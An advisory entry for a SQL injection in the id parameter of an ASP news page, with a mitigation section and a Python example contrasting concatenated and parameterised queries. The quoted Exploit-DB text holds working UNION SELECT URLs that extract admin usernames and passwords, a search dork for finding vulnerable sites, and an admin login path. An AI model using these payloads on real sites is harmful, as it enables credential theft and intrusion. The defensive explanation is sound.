Vendor: Not provided
Discovered by: protocol
CVSS: 7.5 (HIGH)
CWE: CWE-89 (SQL Injection)
Product Name: Not provided
Affected Version From: Not provided
Affected Version To: Not provided
Patch Exists: Not provided
Related CWE: Not provided
CPE: Not provided
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Not provided

(new.asp?id=) SQL Injection Vulnerability

An attacker can exploit this vulnerability by supplying a crafted value in the id parameter of new.asp, which the application places into an SQL query without validating it. The injected query can be used to read sensitive information from the database, such as administrator usernames and passwords, or to modify the database, for example by adding or deleting records.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in an SQL query; here the id parameter is numeric, so any value that is not a plain integer should be rejected before the query is built.
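As an added example, not code from the advisory or from the affected classic ASP application, the following Python/sqlite3 stand-in shows the pattern the mitigation describes: the vulnerable function splices the id parameter into the query text, the hardened function accepts only an integer id and binds it as a query parameter. Table and column names are assumptions modelled on the advisory's adminpassword / username / pw.

```python
import re
import sqlite3


def make_db():
    # Constructed in-memory stand-in for the site's database: a news table
    # that new.asp reads, plus an admin table named like the one in the
    # advisory. Names and sample rows are assumptions, not real data.
    db = sqlite3.connect(":memory:")
    db.executescript(
        """
        CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT);
        CREATE TABLE adminpassword (username TEXT, pw TEXT);
        INSERT INTO news VALUES (1, 'Site launched'), (412, 'Maintenance window');
        INSERT INTO adminpassword VALUES ('admin', 'example-hash');
        """
    )
    return db


def fetch_news_vulnerable(db, raw_id):
    # Mirrors the flaw: the raw request parameter becomes part of the SQL text,
    # so anything after the number is executed as SQL (e.g. a UNION SELECT).
    sql = "SELECT id, title FROM news WHERE id=" + raw_id
    return db.execute(sql).fetchall()


# A news id is a short, positive integer; nothing else is acceptable.
ID_RE = re.compile(r"[0-9]{1,9}")


def is_valid_id(raw_id):
    # Step 1 of the mitigation: validate the parameter's shape before use.
    return ID_RE.fullmatch(raw_id) is not None


def fetch_news_hardened(db, raw_id):
    # Reject anything that is not an integer id.
    if not is_valid_id(raw_id):
        raise ValueError("invalid id parameter")
    # Step 2: bind the value as a parameter so it can never be read as SQL.
    sql = "SELECT id, title FROM news WHERE id=?"
    return db.execute(sql, (int(raw_id),)).fetchall()
```

Running the two functions against the same in-memory database shows why validation alone is not the whole story: the parameterised query treats the id purely as data, while the concatenated one lets a UNION clause pull rows out of the admin table.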
Source: Exploit-DB raw data:

************************************************************
** (new.asp?id=) SQL Injection Vulnerability
************************************************************
** Home: http://www.dz4all.com/cc | http://www.h4ckforu.com/vb
** Risk: high
** Title: (new.asp?id=) SQL Injection Vulnerability
** Dork: "Powerd by www.e-webtech.com"
************************************************************
** Discovered by: protocol
** From: Algeria
** Contact: pre@live.fr
** *********************************************************
** Greets to:
** All Members of http://www.dz4all.com/cc | http://www.h4ckforu.com/vb
** And My ViRuS_Ra3cH & kondamne & komandos & yasMouh & N2N
************************************************************
** Exploit:
**
** http://localhost.com/new.asp?id=1+union+select+0+from+adminpassword
**
**
** Column: username | password & pw
**
**
** Control Panel: http://localhost.com/controlpanel/login.asp
**
** Example:
**
**
** http://server/news.asp?id=412+union+select+1,2,username,pw,5,6,7,8,9,10,11+from+adminpassword
**
**
************************************************************